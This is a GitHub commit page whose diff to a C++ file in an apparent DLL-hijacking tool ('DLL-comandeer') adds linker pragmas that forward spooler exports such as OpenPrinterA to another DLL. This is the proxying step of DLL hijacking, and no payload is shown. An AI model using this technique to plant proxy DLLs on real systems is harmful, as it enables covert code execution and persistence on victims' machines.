We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent f8e0d11 commit 6e35697Copy full SHA for 6e35697
Client/DLL-comandeer/windowsspool.cpp
@@ -6,7 +6,9 @@
6
Author: Shaikh Jamal Uddin (Linkedin: https://www.linkedin.com/in/engrjamal/)
7
8
*/
9
-
+#pragma comment(linker,"/export:OpenPrinterA=winsplhlp.OpenPrinterA,@143")
10
+#pragma comment(linker,"/export:ClosePrinter=winsplhlp.ClosePrinterA,@29")
11
+#pragma comment(linker,"/export:DocumentPropertiesA=winsplhlp.DocumentPropertiesA,@77")
12
13
#include <Windows.h>
14
0 commit comments